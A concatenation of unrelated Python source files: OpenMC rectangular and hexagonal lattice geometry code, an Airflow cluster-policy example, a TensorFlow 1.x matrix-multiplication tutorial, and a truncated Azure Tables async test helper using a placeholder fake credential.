        cv.check_iterable_type('lattice universes', universes, openmc.Universe,
                               min_depth=2, max_depth=3)
        self._universes = np.asarray(universes)

    def find_element(self, point):
        """Determine index of lattice element and local coordinates for a point

        Parameters
        ----------
        point : Iterable of float
            Cartesian coordinates of point

        Returns
        -------
        2- or 3-tuple of int
            A tuple of the corresponding (x,y,z) lattice element indices
        3-tuple of float
            Cartesian coordinates of the point in the corresponding lattice
            element coordinate system

        """
        # Integer division of the offset from the lower-left corner by the
        # pitch gives the (possibly out-of-range) element index
        ix = floor((point[0] - self.lower_left[0])/self.pitch[0])
        iy = floor((point[1] - self.lower_left[1])/self.pitch[1])
        if self.ndim == 2:
            idx = (ix, iy)
        else:
            iz = floor((point[2] - self.lower_left[2])/self.pitch[2])
            idx = (ix, iy, iz)
        return idx, self.get_local_coordinates(point, idx)

    def get_local_coordinates(self, point, idx):
        """Determine local coordinates of a point within a lattice element

        Parameters
        ----------
        point : Iterable of float
            Cartesian coordinates of point
        idx : Iterable of int
            (x,y,z) indices of lattice element. If the lattice is 2D, the z
            index can be omitted.

        Returns
        -------
        3-tuple of float
            Cartesian coordinates of point in the lattice element coordinate
            system

        """
        # Translate so the origin sits at the center of element idx
        x = point[0] - (self.lower_left[0] + (idx[0] + 0.5)*self.pitch[0])
        y = point[1] - (self.lower_left[1] + (idx[1] + 0.5)*self.pitch[1])
        if self.ndim == 2:
            # 2D lattice: z passes through unchanged
            z = point[2]
        else:
            z = point[2] - (self.lower_left[2] + (idx[2] + 0.5)*self.pitch[2])
        return (x, y, z)

    def get_universe_index(self, idx):
        """Return index in the universes array corresponding to a lattice element index

        Parameters
        ----------
        idx : Iterable of int
            Lattice element indices in the :math:`(x,y,z)` coordinate system

        Returns
        -------
        2- or 3-tuple of int
            Indices used when setting the :attr:`RectLattice.universes` property

        """
        # The y-axis is flipped in the universes array (row 0 is the highest
        # physical y), so mirror the y index
        max_y = self.shape[1] - 1
        if self.ndim == 2:
            x, y = idx
            return (max_y - y, x)
        else:
            x, y, z = idx
            return (z, max_y - y, x)

    def is_valid_index(self, idx):
        """Determine whether lattice element index is within defined range

        Parameters
        ----------
        idx : Iterable of int
            Lattice element indices in the :math:`(x,y,z)` coordinate system

        Returns
        -------
        bool
            Whether index is valid

        """
        if self.ndim == 2:
            return (0 <= idx[0] < self.shape[0] and
                    0 <= idx[1] < self.shape[1])
        else:
            return (0 <= idx[0] < self.shape[0] and
                    0 <= idx[1] < self.shape[1] and
                    0 <= idx[2] < self.shape[2])

    def create_xml_subelement(self, xml_element):
        # Serialize this lattice (and the universes it contains) as a
        # <lattice> subelement of xml_element, unless already present.

        # Determine if XML element already contains subelement for this Lattice
        path = './lattice[@id=\'{0}\']'.format(self._id)
        test = xml_element.find(path)

        # If the element does contain the Lattice subelement, then return
        if test is not None:
            return

        lattice_subelement = ET.Element("lattice")
        lattice_subelement.set("id", str(self._id))

        if len(self._name) > 0:
            lattice_subelement.set("name", str(self._name))

        # Export the Lattice cell pitch
        pitch = ET.SubElement(lattice_subelement, "pitch")
        pitch.text = ' '.join(map(str, self._pitch))

        # Export the Lattice outer Universe (if specified)
        if self._outer is not None:
            outer = ET.SubElement(lattice_subelement, "outer")
            outer.text = '{0}'.format(self._outer._id)
            self._outer.create_xml_subelement(xml_element)

        # Export Lattice cell dimensions
        dimension = ET.SubElement(lattice_subelement, "dimension")
        dimension.text = ' '.join(map(str, self.shape))

        # Export Lattice lower left
        lower_left = ET.SubElement(lattice_subelement, "lower_left")
        lower_left.text = ' '.join(map(str, self._lower_left))

        # Export the Lattice nested Universe IDs - column major for Fortran
        universe_ids = '\n'

        # 3D Lattices
        if self.ndim == 3:
            for z in range(self.shape[2]):
                for y in range(self.shape[1]):
                    for x in range(self.shape[0]):
                        universe = self._universes[z][y][x]

                        # Append Universe ID to the Lattice XML subelement
                        universe_ids += '{0} '.format(universe._id)

                        # Create XML subelement for this Universe
                        universe.create_xml_subelement(xml_element)

                    # Add newline character when we reach end of row of cells
                    universe_ids += '\n'

                # Add newline character when we reach end of row of cells
                universe_ids += '\n'

        # 2D Lattices
        else:
            for y in range(self.shape[1]):
                for x in range(self.shape[0]):
                    universe = self._universes[y][x]

                    # Append Universe ID to Lattice XML subelement
                    universe_ids += '{0} '.format(universe._id)

                    # Create XML subelement for this Universe
                    universe.create_xml_subelement(xml_element)

                # Add newline character when we reach end of row of cells
                universe_ids += '\n'

        # Remove trailing newline character from Universe IDs string
        universe_ids = universe_ids.rstrip('\n')

        universes = ET.SubElement(lattice_subelement, "universes")
        universes.text = universe_ids

        # Append the XML subelement for this Lattice to the XML element
        xml_element.append(lattice_subelement)
class HexLattice(Lattice):
    r"""A lattice consisting of hexagonal prisms.
    To completely define a hexagonal lattice, the :attr:`HexLattice.center`,
    :attr:`HexLattice.pitch`, :attr:`HexLattice.universes`, and
    :attr:`HexLattice.outer` properties need to be set.
    Most methods for this class use a natural indexing scheme wherein elements
    are assigned an index corresponding to their position relative to skewed
    :math:`(x,\alpha,z)` axes as described fully in
    :ref:`hexagonal_indexing`. However, note that when universes are assigned to
    lattice elements using the :attr:`HexLattice.universes` property, the array
    indices do not correspond to natural indices.
    Parameters
    ----------
    lattice_id : int, optional
        Unique identifier for the lattice. If not specified, an identifier will
        automatically be assigned.
    name : str, optional
        Name of the lattice. If not specified, the name is the empty string.
    Attributes
    ----------
    id : int
        Unique identifier for the lattice
    name : str
        Name of the lattice
    pitch : Iterable of float
        Pitch of the lattice in cm. The first item in the iterable specifies the
        pitch in the radial direction and, if the lattice is 3D, the second item
        in the iterable specifies the pitch in the axial direction.
    outer : openmc.Universe
        A universe to fill all space outside the lattice
    universes : Nested Iterable of openmc.Universe
        A two- or three-dimensional list/array of universes filling each element
        of the lattice. Each sub-list corresponds to one ring of universes and
        should be ordered from outermost ring to innermost ring. The universes
        within each sub-list are ordered from the "top" and proceed in a
        clockwise fashion. The :meth:`HexLattice.show_indices` method can be
        used to help figure out indices for this property.
    center : Iterable of float
        Coordinates of the center of the lattice. If the lattice does not have
        axial sections then only the x- and y-coordinates are specified
    indices : list of tuple
        A list of all possible (z,r,i) or (r,i) lattice element indices that are
        possible, where z is the axial index, r is the ring index (starting
        from the outermost ring), and i is the index within a ring starting from
        the top and proceeding clockwise.
    num_rings : int
        Number of radial ring positions in the xy-plane
    num_axial : int
        Number of positions along the z-axis.
    """
    def __init__(self, lattice_id=None, name=''):
        super().__init__(lattice_id, name)
        # Initialize Lattice class attributes; these are populated later by
        # the `universes` and `center` property setters.
        self._num_rings = None
        self._num_axial = None
        self._center = None
    def __repr__(self):
        """Return a multi-line, human-readable summary of the lattice."""
        string = 'HexLattice\n'
        string += '{0: <16}{1}{2}\n'.format('\tID', '=\t', self._id)
        string += '{0: <16}{1}{2}\n'.format('\tName', '=\t', self._name)
        string += '{0: <16}{1}{2}\n'.format('\t# Rings', '=\t', self._num_rings)
        string += '{0: <16}{1}{2}\n'.format('\t# Axial', '=\t', self._num_axial)
        string += '{0: <16}{1}{2}\n'.format('\tCenter', '=\t',
                                            self._center)
        string += '{0: <16}{1}{2}\n'.format('\tPitch', '=\t', self._pitch)
        if self._outer is not None:
            string += '{0: <16}{1}{2}\n'.format('\tOuter', '=\t',
                                                self._outer._id)
        else:
            string += '{0: <16}{1}{2}\n'.format('\tOuter', '=\t',
                                                self._outer)
        string += '{0: <16}\n'.format('\tUniverses')
        # Render each axial slice as an ASCII hexagon diagram.
        if self._num_axial is not None:
            slices = [self._repr_axial_slice(x) for x in self._universes]
            string += '\n'.join(slices)
        else:
            string += self._repr_axial_slice(self._universes)
        return string
    @property
    def num_rings(self):
        """Number of radial ring positions in the xy-plane."""
        return self._num_rings
    @property
    def num_axial(self):
        """Number of positions along the z-axis, or None for a 2D lattice."""
        return self._num_axial
    @property
    def center(self):
        """Coordinates of the center of the lattice."""
        return self._center
    @property
    def indices(self):
        # Ring r (0 = outermost) contains 6*(num_rings - 1 - r) elements,
        # except the innermost ring which contains exactly one -- hence the
        # max(..., 1).
        if self.num_axial is None:
            return [(r, i) for r in range(self.num_rings)
                    for i in range(max(6*(self.num_rings - 1 - r), 1))]
        else:
            return [(z, r, i) for z in range(self.num_axial)
                    for r in range(self.num_rings)
                    for i in range(max(6*(self.num_rings - 1 - r), 1))]
    @property
    def _natural_indices(self):
        """Iterate over all possible (x,alpha) or (x,alpha,z) lattice element
        indices.
        This property is used when constructing distributed cell and material
        paths. Most importantly, the iteration order matches that used on the
        Fortran side.
        """
        r = self.num_rings
        # Scan the full (2r-1) x (2r-1) skewed bounding box and keep only
        # indices that actually fall inside the hexagonal region.
        if self.num_axial is None:
            for a in range(-r + 1, r):
                for x in range(-r + 1, r):
                    idx = (x, a)
                    if self.is_valid_index(idx):
                        yield idx
        else:
            for z in range(self.num_axial):
                for a in range(-r + 1, r):
                    for x in range(-r + 1, r):
                        idx = (x, a, z)
                        if self.is_valid_index(idx):
                            yield idx
    @property
    def ndim(self):
        # If the second nesting level already holds Universe objects, the
        # structure is rings-of-universes (2D); otherwise it is
        # slices-of-rings-of-universes (3D).
        return 2 if isinstance(self.universes[0][0], openmc.Universe) else 3
    @center.setter
    def center(self, center):
        cv.check_type('lattice center', center, Iterable, Real)
        cv.check_length('lattice center', center, 2, 3)
        self._center = center
    @Lattice.pitch.setter
    def pitch(self, pitch):
        # One pitch value (radial) for 2D, two (radial, axial) for 3D.
        cv.check_type('lattice pitch', pitch, Iterable, Real)
        cv.check_length('lattice pitch', pitch, 1, 2)
        for dim in pitch:
            cv.check_greater_than('lattice pitch', dim, 0)
        self._pitch = pitch
    @Lattice.universes.setter
    def universes(self, universes):
        cv.check_iterable_type('lattice universes', universes, openmc.Universe,
                               min_depth=2, max_depth=3)
        self._universes = universes
        # NOTE: This routine assumes that the user creates a "ragged" list of
        #       lists, where each sub-list corresponds to one ring of Universes.
        #       The sub-lists are ordered from outermost ring to innermost ring.
        #       The Universes within each sub-list are ordered from the "top" in a
        #       clockwise fashion.
        # Set the number of axial positions.
        if self.ndim == 3:
            self._num_axial = len(self._universes)
        else:
            self._num_axial = None
        # Set the number of rings and make sure this number is consistent for
        # all axial positions.
        if self.ndim == 3:
            self._num_rings = len(self._universes[0])
            for rings in self._universes:
                if len(rings) != self._num_rings:
                    msg = 'HexLattice ID={0:d} has an inconsistent number of ' \
                          'rings per axial positon'.format(self._id)
                    raise ValueError(msg)
        else:
            self._num_rings = len(self._universes)
        # Make sure there are the correct number of elements in each ring.
        if self.ndim == 3:
            for axial_slice in self._universes:
                # Check the center ring.
                if len(axial_slice[-1]) != 1:
                    msg = 'HexLattice ID={0:d} has the wrong number of ' \
                          'elements in the innermost ring. Only 1 element is ' \
                          'allowed in the innermost ring.'.format(self._id)
                    raise ValueError(msg)
                # Check the outer rings.
                for r in range(self._num_rings-1):
                    if len(axial_slice[r]) != 6*(self._num_rings - 1 - r):
                        msg = 'HexLattice ID={0:d} has the wrong number of ' \
                              'elements in ring number {1:d} (counting from the '\
                              'outermost ring). This ring should have {2:d} ' \
                              'elements.'.format(self._id, r,
                                                 6*(self._num_rings - 1 - r))
                        raise ValueError(msg)
        else:
            axial_slice = self._universes
            # Check the center ring.
            if len(axial_slice[-1]) != 1:
                msg = 'HexLattice ID={0:d} has the wrong number of ' \
                      'elements in the innermost ring. Only 1 element is ' \
                      'allowed in the innermost ring.'.format(self._id)
                raise ValueError(msg)
            # Check the outer rings.
            for r in range(self._num_rings-1):
                if len(axial_slice[r]) != 6*(self._num_rings - 1 - r):
                    msg = 'HexLattice ID={0:d} has the wrong number of ' \
                          'elements in ring number {1:d} (counting from the '\
                          'outermost ring). This ring should have {2:d} ' \
                          'elements.'.format(self._id, r,
                                             6*(self._num_rings - 1 - r))
                    raise ValueError(msg)
    def find_element(self, point):
        r"""Determine index of lattice element and local coordinates for a point
        Parameters
        ----------
        point : Iterable of float
            Cartesian coordinates of point
        Returns
        -------
        3-tuple of int
            Indices of corresponding lattice element in :math:`(x,\alpha,z)`
            bases
        numpy.ndarray
            Cartesian coordinates of the point in the corresponding lattice
            element coordinate system
        """
        # Convert coordinates to skewed bases
        x = point[0] - self.center[0]
        y = point[1] - self.center[1]
        if self._num_axial is None:
            # 2D lattice: the axial index is a placeholder; it is ignored by
            # get_local_coordinates/get_universe_index when num_axial is None.
            iz = 1
        else:
            z = point[2] - self.center[2]
            iz = floor(z/self.pitch[1] + 0.5*self.num_axial)
        alpha = y - x/sqrt(3.)
        ix = floor(x/(sqrt(0.75) * self.pitch[0]))
        ia = floor(alpha/self.pitch[0])
        # Check four lattice elements to see which one is closest based on local
        # coordinates
        d_min = np.inf
        for idx in [(ix, ia, iz), (ix + 1, ia, iz), (ix, ia + 1, iz),
                    (ix + 1, ia + 1, iz)]:
            p = self.get_local_coordinates(point, idx)
            d = p[0]**2 + p[1]**2
            if d < d_min:
                d_min = d
                idx_min = idx
                p_min = p
        return idx_min, p_min
    def get_local_coordinates(self, point, idx):
        r"""Determine local coordinates of a point within a lattice element
        Parameters
        ----------
        point : Iterable of float
            Cartesian coordinates of point
        idx : Iterable of int
            Indices of lattice element in :math:`(x,\alpha,z)` bases
        Returns
        -------
        3-tuple of float
            Cartesian coordinates of point in the lattice element coordinate
            system
        """
        # Subtract the Cartesian position of the element's center; the x-index
        # advances by sqrt(3)/2 * pitch in x and half a pitch in y.
        x = point[0] - (self.center[0] + sqrt(0.75)*self.pitch[0]*idx[0])
        y = point[1] - (self.center[1] + (0.5*idx[0] + idx[1])*self.pitch[0])
        if self._num_axial is None:
            z = point[2]
        else:
            z = point[2] - (self.center[2] + (idx[2] + 0.5 - 0.5*self.num_axial)*
                            self.pitch[1])
        return (x, y, z)
    def get_universe_index(self, idx):
        r"""Return index in the universes array corresponding to a lattice element index
        Parameters
        ----------
        idx : Iterable of int
            Lattice element indices in the :math:`(x,\alpha,z)` coordinate
            system
        Returns
        -------
        2- or 3-tuple of int
            Indices used when setting the :attr:`HexLattice.universes` property
        """
        # First we determine which ring the index corresponds to.
        x = idx[0]
        a = idx[1]
        z = -a - x
        # (x, a, z) sum to zero, so the max of their magnitudes gives the ring
        # distance from the lattice center.
        g = max(abs(x), abs(a), abs(z))
        # Next we use a clever method to figure out where along the ring we are.
        # i_within counts clockwise from the "top" of ring g; each of the six
        # branches below covers one 60-degree sector of the hexagon.
        i_ring = self._num_rings - 1 - g
        if x >= 0:
            if a >= 0:
                i_within = x
            else:
                i_within = 2*g + z
        else:
            if a <= 0:
                i_within = 3*g - x
            else:
                i_within = 5*g - z
        if self.num_axial is None:
            return (i_ring, i_within)
        else:
            return (idx[2], i_ring, i_within)
    def is_valid_index(self, idx):
        r"""Determine whether lattice element index is within defined range
        Parameters
        ----------
        idx : Iterable of int
            Lattice element indices in the :math:`(x,\alpha,z)` coordinate
            system
        Returns
        -------
        bool
            Whether index is valid
        """
        x = idx[0]
        y = idx[1]
        z = 0 - y - x
        # Hex ring distance from the center (cube-coordinate style).
        g = max(abs(x), abs(y), abs(z))
        if self.num_axial is None:
            return g < self.num_rings
        else:
            return g < self.num_rings and 0 <= idx[2] < self.num_axial
    def create_xml_subelement(self, xml_element):
        """Add a ``hex_lattice`` subelement (and nested universes) to xml_element."""
        # Determine if XML element already contains subelement for this Lattice
        path = './hex_lattice[@id=\'{0}\']'.format(self._id)
        test = xml_element.find(path)
        # If the element does contain the Lattice subelement, then return
        if test is not None:
            return
        lattice_subelement = ET.Element("hex_lattice")
        lattice_subelement.set("id", str(self._id))
        if len(self._name) > 0:
            lattice_subelement.set("name", str(self._name))
        # Export the Lattice cell pitch
        pitch = ET.SubElement(lattice_subelement, "pitch")
        pitch.text = ' '.join(map(str, self._pitch))
        # Export the Lattice outer Universe (if specified)
        if self._outer is not None:
            outer = ET.SubElement(lattice_subelement, "outer")
            outer.text = '{0}'.format(self._outer._id)
            self._outer.create_xml_subelement(xml_element)
        lattice_subelement.set("n_rings", str(self._num_rings))
        if self._num_axial is not None:
            lattice_subelement.set("n_axial", str(self._num_axial))
        # Export Lattice cell center
        center = ET.SubElement(lattice_subelement, "center")
        center.text = ' '.join(map(str, self._center))
        # Export the Lattice nested Universe IDs.
        # 3D Lattices
        if self._num_axial is not None:
            slices = []
            for z in range(self._num_axial):
                # Initialize the center universe.
                universe = self._universes[z][-1][0]
                universe.create_xml_subelement(xml_element)
                # Initialize the remaining universes.
                for r in range(self._num_rings-1):
                    for theta in range(6*(self._num_rings - 1 - r)):
                        universe = self._universes[z][r][theta]
                        universe.create_xml_subelement(xml_element)
                # Get a string representation of the universe IDs.
                slices.append(self._repr_axial_slice(self._universes[z]))
            # Collapse the list of axial slices into a single string.
            universe_ids = '\n'.join(slices)
        # 2D Lattices
        else:
            # Initialize the center universe.
            universe = self._universes[-1][0]
            universe.create_xml_subelement(xml_element)
            # Initialize the remaining universes.
            for r in range(self._num_rings - 1):
                for theta in range(6*(self._num_rings - 1 - r)):
                    universe = self._universes[r][theta]
                    universe.create_xml_subelement(xml_element)
            # Get a string representation of the universe IDs.
            universe_ids = self._repr_axial_slice(self._universes)
        universes = ET.SubElement(lattice_subelement, "universes")
        universes.text = '\n' + universe_ids
        # Append the XML subelement for this Lattice to the XML element
        xml_element.append(lattice_subelement)
    def _repr_axial_slice(self, universes):
        """Return string representation for the given 2D group of universes.
        The 'universes' argument should be a list of lists of universes where
        each sub-list represents a single ring. The first list should be the
        outer ring.
        """
        # Find the largest universe ID and count the number of digits so we can
        # properly pad the output string later.
        largest_id = max([max([univ._id for univ in ring])
                          for ring in universes])
        n_digits = len(str(largest_id))
        pad = ' '*n_digits
        id_form = '{: ^' + str(n_digits) + 'd}'
        # Initialize the list for each row.  A hexagon with R rings spans
        # 1 + 4*(R-1) text rows; 'middle' is the row holding the center.
        rows = [[] for i in range(1 + 4 * (self._num_rings-1))]
        middle = 2 * (self._num_rings - 1)
        # Start with the degenerate first ring.
        universe = universes[-1][0]
        rows[middle] = [id_form.format(universe._id)]
        # Add universes one ring at a time.
        for r in range(1, self._num_rings):
            # r_prime increments down while r increments up.
            r_prime = self._num_rings - 1 - r
            theta = 0
            y = middle + 2*r
            # The six loops below walk the ring clockwise starting at its top,
            # appending on the right-hand side and prepending on the left.
            # Climb down the top-right.
            for i in range(r):
                # Add the universe.
                universe = universes[r_prime][theta]
                rows[y].append(id_form.format(universe._id))
                # Translate the indices.
                y -= 1
                theta += 1
            # Climb down the right.
            for i in range(r):
                # Add the universe.
                universe = universes[r_prime][theta]
                rows[y].append(id_form.format(universe._id))
                # Translate the indices.
                y -= 2
                theta += 1
            # Climb down the bottom-right.
            for i in range(r):
                # Add the universe.
                universe = universes[r_prime][theta]
                rows[y].append(id_form.format(universe._id))
                # Translate the indices.
                y -= 1
                theta += 1
            # Climb up the bottom-left.
            for i in range(r):
                # Add the universe.
                universe = universes[r_prime][theta]
                rows[y].insert(0, id_form.format(universe._id))
                # Translate the indices.
                y += 1
                theta += 1
            # Climb up the left.
            for i in range(r):
                # Add the universe.
                universe = universes[r_prime][theta]
                rows[y].insert(0, id_form.format(universe._id))
                # Translate the indices.
                y += 2
                theta += 1
            # Climb up the top-left.
            for i in range(r):
                # Add the universe.
                universe = universes[r_prime][theta]
                rows[y].insert(0, id_form.format(universe._id))
                # Translate the indices.
                y += 1
                theta += 1
        # Flip the rows and join each row into a single string.
        rows = [pad.join(x) for x in rows[::-1]]
        # Pad the beginning of the rows so they line up properly.
        for y in range(self._num_rings - 1):
            rows[y] = (self._num_rings - 1 - y)*pad + rows[y]
            rows[-1 - y] = (self._num_rings - 1 - y)*pad + rows[-1 - y]
        for y in range(self._num_rings % 2, self._num_rings, 2):
            rows[middle + y] = pad + rows[middle + y]
            if y != 0:
                rows[middle - y] = pad + rows[middle - y]
        # Join the rows together and return the string.
        universe_ids = '\n'.join(rows)
        return universe_ids
    @staticmethod
    def show_indices(num_rings):
        """Return a diagram of the hexagonal lattice layout with indices.
        This method can be used to show the proper indices to be used when
        setting the :attr:`HexLattice.universes` property. For example, running
        this method with num_rings=3 will return the following diagram::

                      (0, 0)
                (0,11)      (0, 1)
          (0,10)      (1, 0)      (0, 2)
                (1, 5)      (1, 1)
          (0, 9)      (2, 0)      (0, 3)
                (1, 4)      (1, 2)
          (0, 8)      (1, 3)      (0, 4)
                (0, 7)      (0, 5)
                      (0, 6)

        Parameters
        ----------
        num_rings : int
            Number of rings in the hexagonal lattice
        Returns
        -------
        str
            Diagram of the hexagonal lattice showing indices
        """
        # Find the largest string and count the number of digits so we can
        # properly pad the output string later
        largest_index = 6*(num_rings - 1)
        n_digits_index = len(str(largest_index))
        n_digits_ring = len(str(num_rings - 1))
        str_form = '({{:{}}},{{:{}}})'.format(n_digits_ring, n_digits_index)
        pad = ' '*(n_digits_index + n_digits_ring + 3)
        # Initialize the list for each row.
        rows = [[] for i in range(1 + 4 * (num_rings-1))]
        middle = 2 * (num_rings - 1)
        # Start with the degenerate first ring.
        rows[middle] = [str_form.format(num_rings - 1, 0)]
        # Add universes one ring at a time.  The ring walk mirrors
        # _repr_axial_slice but emits (ring, position) labels instead of IDs.
        for r in range(1, num_rings):
            # r_prime increments down while r increments up.
            r_prime = num_rings - 1 - r
            theta = 0
            y = middle + 2*r
            for i in range(r):
                # Climb down the top-right.
                rows[y].append(str_form.format(r_prime, theta))
                y -= 1
                theta += 1
            for i in range(r):
                # Climb down the right.
                rows[y].append(str_form.format(r_prime, theta))
                y -= 2
                theta += 1
            for i in range(r):
                # Climb down the bottom-right.
                rows[y].append(str_form.format(r_prime, theta))
                y -= 1
                theta += 1
            for i in range(r):
                # Climb up the bottom-left.
                rows[y].insert(0, str_form.format(r_prime, theta))
                y += 1
                theta += 1
            for i in range(r):
                # Climb up the left.
                rows[y].insert(0, str_form.format(r_prime, theta))
                y += 2
                theta += 1
            for i in range(r):
                # Climb up the top-left.
                rows[y].insert(0, str_form.format(r_prime, theta))
                y += 1
                theta += 1
        # Flip the rows and join each row into a single string.
        rows = [pad.join(x) for x in rows[::-1]]
        # Pad the beginning of the rows so they line up properly.
        for y in range(num_rings - 1):
            rows[y] = (num_rings - 1 - y)*pad + rows[y]
            rows[-1 - y] = (num_rings - 1 - y)*pad + rows[-1 - y]
        for y in range(num_rings % 2, num_rings, 2):
            rows[middle + y] = pad + rows[middle + y]
            if y != 0:
                rows[middle - y] = pad + rows[middle - y]
        # Join the rows together and return the string.
        return '\n'.join(rows)
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Callable, List
from airflow.configuration import conf
from airflow.exceptions import AirflowClusterPolicyViolation
from airflow.models.baseoperator import BaseOperator
# [START example_cluster_policy_rule]
def task_must_have_owners(task: BaseOperator):
    """Raise AirflowClusterPolicyViolation unless *task* has an explicit,
    non-default owner."""
    if task.owner:
        # Owner is set; it is acceptable as long as it differs (case-
        # insensitively) from the configured default owner.
        if task.owner.lower() != conf.get('operators', 'default_owner'):
            return
    raise AirflowClusterPolicyViolation(
        f'''Task must have non-None non-default owner. Current value: {task.owner}'''
    )
# [END example_cluster_policy_rule]
# [START example_list_of_cluster_policy_rules]
# Ordered list of task-level policy rules; each callable raises
# AirflowClusterPolicyViolation when the given task violates the rule.
TASK_RULES: List[Callable[[BaseOperator], None]] = [
    task_must_have_owners,
]
def _check_task_rules(current_task: BaseOperator):
    """Check task rules for given task.

    Runs every rule in TASK_RULES, collects all violations, and raises a
    single AirflowClusterPolicyViolation summarizing them.
    """
    violations = []
    for task_rule in TASK_RULES:
        try:
            task_rule(current_task)
        except AirflowClusterPolicyViolation as violation:
            violations.append(str(violation))
    if not violations:
        return
    # Render the collected violations as a bulleted list.
    notices_list = " * " + "\n * ".join(violations)
    raise AirflowClusterPolicyViolation(
        f"DAG policy violation (DAG ID: {current_task.dag_id}, Path: {current_task.dag.filepath}):\n"
        f"Notices:\n"
        f"{notices_list}"
    )
def cluster_policy(task: BaseOperator):
    """Ensure Tasks have non-default owners."""
    # Entry point Airflow calls per task; delegates to the TASK_RULES list.
    _check_task_rules(task)
# [END example_list_of_cluster_policy_rules]
|
#-*- coding: utf-8 -*-
"""
#---------------------------------------------
  filename: ex_runTFmatmul.py
  - Construct a computational graph which calculates
    a matrix multiplication in Tensorflow
  - Use tf.constant() in a matrix form

  Written by Jaewook Kang
  2017 Aug.
#-------------------------------------------
"""
# NOTE(review): uses the TensorFlow 1.x graph/Session API; will not run
# unmodified on TensorFlow 2.x.
import tensorflow as tf
# computational TF graph construction ================================
# Create a Constant op that produces a 1x2 matrix.
# The op is added as a node to the default graph.
#
# The value returned by the constructor (matrix1) represents the output of
# the Constant op.
matrix1 = tf.constant([[3., 3.]]) # 1 by 2
# Create another Constant op that produces a 2x1 matrix.
matrix2 = tf.constant([[2.],[2.]]) # 2 by 1
# Create a Matmul op that takes 'matrix1' and 'matrix2' as inputs.
# The returned 'product' represents the result of the matrix multiplication.
product = tf.matmul(matrix1, matrix2)
# Create a session for the computational graph ==================
sess = tf.Session()
result = sess.run(product)
print(result)
# ==> [[ 12.]]
sess.close()
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from __future__ import division
from datetime import datetime
from dateutil.tz import tzutc
import uuid
from azure.core.credentials import AccessToken
from azure.core.exceptions import ResourceExistsError
from azure.data.tables import (
EntityProperty,
EdmType,
)
from azure.data.tables.aio import TableServiceClient
from azure.identity.aio import DefaultAzureCredential
from devtools_testutils import is_live
from .testcase import TableTestCase, SLEEP_DELAY
# Prefix used when generating unique table names for the async table tests.
TEST_TABLE_PREFIX = "pytableasync"
class AsyncFakeTokenCredential(object):
    """Fake async token credential for recorded (non-live) test runs.

    Mimics the protocol of classes able to provide OAuth tokens by returning
    a fixed placeholder AccessToken from get_token.
    """
    def __init__(self):
        # Placeholder token with an expiry of 0; never sent to a live service.
        self.token = AccessToken("YOU SHALL NOT PASS", 0)
    async def get_token(self, *args):
        return self.token
class AsyncTableTestCase(TableTestCase):
    """Shared async helpers for Azure Tables tests: setup, teardown, and
    entity/table fixtures."""
    def get_token_credential(self):
        # Real credential only against live services; otherwise a fake one.
        if is_live():
            return DefaultAzureCredential()
        return self.generate_fake_token()
    def generate_fake_token(self):
        return AsyncFakeTokenCredential()
    def _get_table_reference(self, prefix=TEST_TABLE_PREFIX):
        # Returns a unique table name derived from the given prefix.
        table_name = self.get_resource_name(prefix)
        return table_name
    async def _create_table(self, ts, prefix=TEST_TABLE_PREFIX, table_list=None):
        """Create (or fetch, if it already exists) a table and optionally
        record it in *table_list* for later cleanup."""
        table_name = self._get_table_reference(prefix)
        try:
            table = await ts.create_table(table_name)
            if table_list is not None:
                table_list.append(table)
        except ResourceExistsError:
            # Table already exists; return a client for it instead.
            table = ts.get_table_client(table_name)
        return table
    async def _delete_all_tables(self, account_name, key):
        # Deletes every table in the (cosmos) account; used for cleanup.
        client = TableServiceClient(self.account_url(account_name, "cosmos"), credential=key)
        async for table in client.list_tables():
            await client.delete_table(table.name)
        if self.is_live:
            # Give the service time to propagate the deletions.
            self.sleep(10)
    async def _tear_down(self):
        # Live runs delete all tables created by the test; recorded runs skip.
        if is_live():
            async for table in self.ts.list_tables():
                await self.ts.delete_table(table.name)
            self.test_tables = []
        await self.ts.close()
    async def _create_query_table(self, entity_count):
        """
        Creates a table with the specified name and adds entities with the
        default set of values. PartitionKey is set to 'MyPartition' and RowKey
        is set to a unique counter value starting at 1 (as a string).
        """
        table_name = self.get_resource_name("querytable")
        table = await self.ts.create_table(table_name)
        self.query_tables.append(table_name)
        client = self.ts.get_table_client(table_name)
        entity = self._create_random_entity_dict()
        for i in range(1, entity_count + 1):
            # NOTE(review): the RowKey accumulates ("rk1", "rk12", "rk123",
            # ...) rather than being rebuilt from the base each iteration;
            # keys stay unique, but confirm this growth is intentional.
            entity["RowKey"] = entity["RowKey"] + str(i)
            await client.create_entity(entity=entity)
        return client
    async def _insert_two_opposite_entities(self, pk=None, rk=None):
        """Insert a random entity plus a second entity with contrasting
        property values; returns the first entity and its create response."""
        entity1 = self._create_random_entity_dict()
        resp = await self.table.create_entity(entity1)
        partition, row = self._create_pk_rk(pk, rk)
        properties = {
            "PartitionKey": partition + u"1",
            "RowKey": row + u"1",
            "age": 49,
            "sex": u"female",
            "married": False,
            "deceased": True,
            "optional": None,
            "ratio": 5.2,
            "evenratio": 6.0,
            "large": 39999011,
            "Birthday": datetime(1993, 4, 1, tzinfo=tzutc()),
            "birthday": datetime(1990, 4, 1, tzinfo=tzutc()),
            "binary": b"binary-binary",
            "other": EntityProperty(40, EdmType.INT32),
            "clsid": uuid.UUID("c8da6455-213e-42d9-9b79-3f9149a57833"),
        }
        await self.table.create_entity(properties)
        return entity1, resp
    async def _insert_random_entity(self, pk=None, rk=None):
        # Insert one random entity and return it with its etag.
        entity = self._create_random_entity_dict(pk, rk)
        metadata = await self.table.create_entity(entity=entity)
        return entity, metadata["etag"]
    async def _set_up(self, account_name, credential, url="table"):
        """Create the service client and default test table for a test run."""
        account_url = self.account_url(account_name, url)
        self.ts = TableServiceClient(account_url, credential=credential)
        self.table_name = self.get_resource_name("uttable")
        self.table = self.ts.get_table_client(self.table_name)
        if self.is_live:
            try:
